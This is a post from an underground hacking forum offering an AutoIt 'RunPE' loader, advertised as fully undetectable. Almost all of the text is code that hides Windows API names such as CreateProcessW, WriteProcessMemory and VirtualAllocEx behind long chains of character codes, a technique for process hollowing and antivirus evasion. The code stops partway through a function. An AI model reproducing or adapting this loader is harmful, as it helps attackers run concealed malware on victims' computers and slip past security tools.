HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

AutoIT Encrypted RunPE (Full FUD)

Status
Not open for further replies.
D

DDoSer

The Real DDoSer
User
Joined
Oct 9, 2013
Messages
352
Reputation
0
Reaction score
4,578
Points
243
Credits
0
‎11 Years of Service‎
51%
[HIDE-THANKS]

Code: 
>RunBinary($Datas, "", $ProgramRunPe)

Local $1 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100)
Local $2 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100)
Global $p2r = GetChr(112) & GetChr(116) & GetChr(114)
Global $tmpd = GetChr(84) & GetChr(101) & GetChr(114) & GetChr(109) & GetChr(105) & GetChr(110) & GetChr(97) & GetChr(116) & GetChr(101) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115)
Global $byt = GetChr(98) & GetChr(121) & GetChr(116) & GetChr(101) & GetChr(91)
Global $cpw = GetChr(67) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(116) & GetChr(101) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(87)
Global $ws = GetChr(119) & GetChr(115) & GetChr(116) & GetChr(114)
Global $bo = GetChr(98) & GetChr(111) & GetChr(111) & GetChr(108)
Global $ha = GetChr(104) & GetChr(97) & GetChr(110) & GetChr(100) & GetChr(108) & GetChr(101)
Global $dw = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100)
Global $list = ProcessList()

Func RunBinary($Img, $Cmd, $Mod)
Global $wpm = GetChr(87) & GetChr(114) & GetChr(105) & GetChr(116) & GetChr(101) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & _
		GetChr(115) & GetChr(77) & GetChr(101) & GetChr(109) & GetChr(111) & GetChr(114) & GetChr(121)
Global $knl = GetChr(107) & GetChr(101) & GetChr(114) & GetChr(110) & GetChr(101) & GetChr(108) & GetChr(51) & GetChr(50) & GetChr(46) & GetChr(100) & GetChr(108) & GetChr(108)

#Region 1. DETERMINE INTERPRETER TYPE
Local $x64 = @AutoItX64
Local $6 = Binary($Img)
Local $7 = sv1($byt & BinaryLen($6) & GetChr(93))
DllStructSetData($7, 1, $6)
Local $ptr = DllStructGetPtr($7)
Local $lies1 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(32) & GetChr(99) & GetChr(98) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(100) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(68) & GetChr(101) & GetChr(115) & GetChr(107) & GetChr(116) & GetChr(111) & GetChr(112) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(84) & GetChr(105) & GetChr(116) & GetChr(108) & GetChr(101) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114)
Local $lies2 = GetChr(100) & GetChr(32) & GetChr(88) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(89) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(88) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(89) & GetChr(83) & GetChr(105) & GetChr(122) & GetChr(101) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114)
Local $lies3 = GetChr(100) & GetChr(32) & GetChr(88) & GetChr(67) & GetChr(111) & GetChr(117) & GetChr(110) & GetChr(116) & GetChr(67) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(89) & GetChr(67) & GetChr(111) & GetChr(117) & GetChr(110) & GetChr(116) & GetChr(67) & GetChr(104) & GetChr(97) & GetChr(114) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(70) & GetChr(105) & GetChr(108) & GetChr(108) & GetChr(65) & GetChr(116) & GetChr(116) & GetChr(114) & GetChr(105) & GetChr(98) & GetChr(117) & GetChr(116) & GetChr(101) & GetChr(59)
Local $lies4 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(104) & GetChr(111) & GetChr(119) & GetChr(87) & GetChr(105) & GetChr(110) & GetChr(100) & GetChr(111) & GetChr(119) & GetChr(59) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114) & GetChr(118) & GetChr(101) & GetChr(100) & GetChr(50) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(115) & GetChr(101) & GetChr(114)
Local $lies5 = GetChr(118) & GetChr(101) & GetChr(100) & GetChr(50) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(104) & GetChr(83) & GetChr(116) & GetChr(100) & GetChr(73) & GetChr(110) & GetChr(112) & GetChr(117) & GetChr(116) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(104) & GetChr(83) & GetChr(116) & GetChr(100) & GetChr(79) & GetChr(117) & GetChr(116) & GetChr(112) & GetChr(117) & GetChr(116) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(104) & GetChr(83) & GetChr(116) & GetChr(100) & GetChr(69) & GetChr(114) & GetChr(114) & GetChr(111) & GetChr(114)
Local $si = sv1($lies1 & $lies2 & $lies3 & _
		$lies4 & $lies5)
Local $pi = sv1(GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(59) & GetChr(112) & GetChr(116) & GetChr(114) & GetChr(32) & GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115) & GetChr(73) & GetChr(100) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(73) & GetChr(100))
Local $call = sv3($knl, $bo, $cpw, $ws, $Mod, $ws, $Cmd, $p2r, 0, $p2r, 0, GetChr(105) & GetChr(110) & GetChr(116), 0, $dw, 4, $p2r, 0, $p2r, 0, _
		$p2r, DllStructGetPtr($si), $p2r, DllStructGetPtr($pi))
Local $handle1 = sv2($pi, GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115))
Local $handle2 = sv2($pi, GetChr(84) & GetChr(104) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(100))
Local $check = sv3($knl, $bo, GetChr(73) & GetChr(115) & GetChr(87) & GetChr(111) & GetChr(119) & GetChr(54) & GetChr(52) & GetChr(80) & GetChr(114) & GetChr(111) & GetChr(99) & GetChr(101) & GetChr(115) & GetChr(115), $ha, $handle1, GetChr(98) & GetChr(111) & GetChr(111) & GetChr(108) & GetChr(42), 0)
If $x64 And $check[2] Then
	sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
EndIf
Global $vex = GetChr(86) & GetChr(105) & GetChr(114) & GetChr(116) & GetChr(117) & GetChr(97) & GetChr(108) & GetChr(65) & GetChr(108) & GetChr(108) & GetChr(111) & GetChr(99) & GetChr(69) & GetChr(120)
Local $flag
Local $context

#Region 4. FILL CONTEXT STRUCTURE
If $x64 Then
	If @OSArch = GetChr(88) & GetChr(54) & GetChr(52) Then
		$flag = 2
		Local $cont1 = GetChr(97) & GetChr(108) & GetChr(105) & GetChr(103) & GetChr(110) & GetChr(32) & GetChr(49) & GetChr(54) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(80) & GetChr(49) & GetChr(72) & GetChr(111) & GetChr(109) & GetChr(101) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(80) & GetChr(50) & GetChr(72) & GetChr(111) & GetChr(109) & GetChr(101) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110)
		Local $cont2 = GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(80) & GetChr(51) & GetChr(72) & GetChr(111) & GetChr(109) & GetChr(101) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(80) & GetChr(52) & GetChr(72) & GetChr(111) & GetChr(109) & GetChr(101) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(80) & GetChr(53) & GetChr(72) & GetChr(111) & GetChr(109) & GetChr(101) & GetChr(59) & GetChr(32)
		Local $cont3 = GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(80) & GetChr(54) & GetChr(72) & GetChr(111) & GetChr(109) & GetChr(101) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(120) & GetChr(116) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(77) & GetChr(120) & GetChr(67) & GetChr(115) & GetChr(114) & GetChr(59)
		Local $cont4 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(67) & GetChr(83) & GetChr(59) & GetChr(32) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(68) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(69) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101)
		Local $cont5 = GetChr(103) & GetChr(70) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(71) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(83) & GetChr(115) & GetChr(59)
		Local $cont6 = GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115) & GetChr(59) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(48) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(49) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105)
		Local $cont7 = GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(50) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(51) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(54) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(55) & GetChr(59)
		Local $cont8 = GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(97) & GetChr(120) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(99) & GetChr(120) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(100) & GetChr(120) & GetChr(59) & GetChr(32)
		Local $cont9 = GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(98) & GetChr(120) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(115) & GetChr(112) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82)
		Local $cont10 = GetChr(98) & GetChr(112) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(115) & GetChr(105) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(100) & GetChr(105) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110)
		Local $cont11 = GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(56) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(57) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(49) & GetChr(48) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105)
		Local $cont12 = GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(49) & GetChr(49) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(49) & GetChr(50) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(49) & GetChr(51)
		Local $cont13 = GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(49) & GetChr(52) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(49) & GetChr(53) & GetChr(59) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(82) & GetChr(105) & GetChr(112) & GetChr(59)
		Local $cont14 = GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(72) & GetChr(101) & GetChr(97) & GetChr(100) & GetChr(101) & GetChr(114) & GetChr(91) & GetChr(52) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(76) & GetChr(101) & GetChr(103) & GetChr(97) & GetChr(99) & GetChr(121) & GetChr(91) & GetChr(49) & GetChr(54) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116)
		Local $cont15 = GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(48) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(49) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(50) & GetChr(91)
		Local $cont16 = GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(51) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(52) & GetChr(91)
		Local $cont17 = GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(53) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(54) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117)
		Local $cont18 = GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(55) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(56) & GetChr(91) & GetChr(50)
		Local $cont19 = GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(57) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(49) & GetChr(48) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59)
		Local $cont20 = GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(49) & GetChr(49) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(49) & GetChr(50) & GetChr(91)
		Local $cont21 = GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(49) & GetChr(51) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116)
		Local $cont22 = GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(49) & GetChr(52) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(88) & GetChr(109) & GetChr(109) & GetChr(49) & GetChr(53) & GetChr(91) & GetChr(50) & GetChr(93) & GetChr(59)
		Local $cont23 = GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(86) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(111) & GetChr(114) & GetChr(82) & GetChr(101) & GetChr(103) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(91) & GetChr(53) & GetChr(50) & GetChr(93) & GetChr(59)
		Local $cont24 = GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(86) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(111) & GetChr(114) & GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(114) & GetChr(111) & GetChr(108) & GetChr(59) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(68) & GetChr(101) & GetChr(98) & GetChr(117) & GetChr(103)
		Local $cont25 = GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(114) & GetChr(111) & GetChr(108) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(76) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(66) & GetChr(114) & GetChr(97) & GetChr(110) & GetChr(99) & GetChr(104) & GetChr(84) & GetChr(111)
		Local $cont26 = GetChr(82) & GetChr(105) & GetChr(112) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(76) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(66) & GetChr(114) & GetChr(97) & GetChr(110) & GetChr(99) & GetChr(104) & GetChr(70) & GetChr(114) & GetChr(111) & GetChr(109) & GetChr(82) & GetChr(105)
		Local $cont27 = GetChr(112) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(76) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(69) & GetChr(120) & GetChr(99) & GetChr(101) & GetChr(112) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(84) & GetChr(111) & GetChr(82)
		Local $cont28 = GetChr(105) & GetChr(112) & GetChr(59) & GetChr(32) & GetChr(117) & GetChr(105) & GetChr(110) & GetChr(116) & GetChr(54) & GetChr(52) & GetChr(32) & GetChr(76) & GetChr(97) & GetChr(115) & GetChr(116) & GetChr(69) & GetChr(120) & GetChr(99) & GetChr(101) & GetChr(112) & GetChr(116) & GetChr(105) & GetChr(111) & GetChr(110) & GetChr(70) & GetChr(114) & GetChr(111) & GetChr(109) & GetChr(82) & GetChr(105) & GetChr(112)
		$context = sv1($cont1 & $cont2 & $cont3 & _
				$cont4 & $cont5 & $cont6 & $cont7 & _
				$cont8 & $cont9 & $cont10 & $cont11 & $cont12 & $cont13 & _
				$cont14 & $cont15 & $cont16 & $cont17 & $cont18 & $cont19 & $cont20 & $cont21 & $cont22 & _
				$cont23 & $cont24 & $cont25 & $cont26 & $cont27 & $cont28)
	Else
		$flag = 3
		sv3($knl, $bo, $tmpd, $ha, $handle1, $dw, 0)
	EndIf
Else
	$flag = 1
	Local $cont1 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(101) & GetChr(120) & GetChr(116) & GetChr(70) & GetChr(108) & GetChr(97) & GetChr(103) & GetChr(115) & GetChr(59) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(48) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119)
	Local $cont2 = GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(49) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(50) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32)
	Local $cont3 = GetChr(68) & GetChr(114) & GetChr(51) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(54) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(68) & GetChr(114) & GetChr(55) & GetChr(59)
	Local $cont4 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(111) & GetChr(110) & GetChr(116) & GetChr(114) & GetChr(111) & GetChr(108) & GetChr(87) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(116) & GetChr(117) & GetChr(115) & GetChr(87)
	Local $cont5 = GetChr(111) & GetChr(114) & GetChr(100) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(84) & GetChr(97) & GetChr(103) & GetChr(87) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111)
	Local $cont6 = GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(114) & GetChr(114) & GetChr(111) & GetChr(114) & GetChr(79) & GetChr(102) & GetChr(102) & GetChr(115) & GetChr(101) & GetChr(116) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(69) & GetChr(114) & GetChr(114) & GetChr(111) & GetChr(114) & GetChr(83) & GetChr(101) & GetChr(108)
	Local $cont7 = GetChr(101) & GetChr(99) & GetChr(116) & GetChr(111) & GetChr(114) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(79) & GetChr(102) & GetChr(102) & GetChr(115) & GetChr(101) & GetChr(116) & GetChr(59) & GetChr(32) & GetChr(100)
	Local $cont8 = GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(68) & GetChr(97) & GetChr(116) & GetChr(97) & GetChr(83) & GetChr(101) & GetChr(108) & GetChr(101) & GetChr(99) & GetChr(116) & GetChr(111) & GetChr(114) & GetChr(59) & GetChr(32) & GetChr(98) & GetChr(121) & GetChr(116)
	Local $cont9 = GetChr(101) & GetChr(32) & GetChr(82) & GetChr(101) & GetChr(103) & GetChr(105) & GetChr(115) & GetChr(116) & GetChr(101) & GetChr(114) & GetChr(65) & GetChr(114) & GetChr(101) & GetChr(97) & GetChr(91) & GetChr(56) & GetChr(48) & GetChr(93) & GetChr(59)
	Local $cont10 = GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(67) & GetChr(114) & GetChr(48) & GetChr(78) & GetChr(112) & GetChr(120) & GetChr(83) & GetChr(116) & GetChr(97) & GetChr(116) & GetChr(101) & GetChr(59)
	Local $cont11 = GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(71) & GetChr(115) & GetChr(59) & GetChr(32) & GetChr(100) & GetChr(119) & GetChr(111) & GetChr(114) & GetChr(100) & GetChr(32) & GetChr(83) & GetChr(101) & GetChr(103) & GetChr(70) & GetChr(115) & GetChr(59)
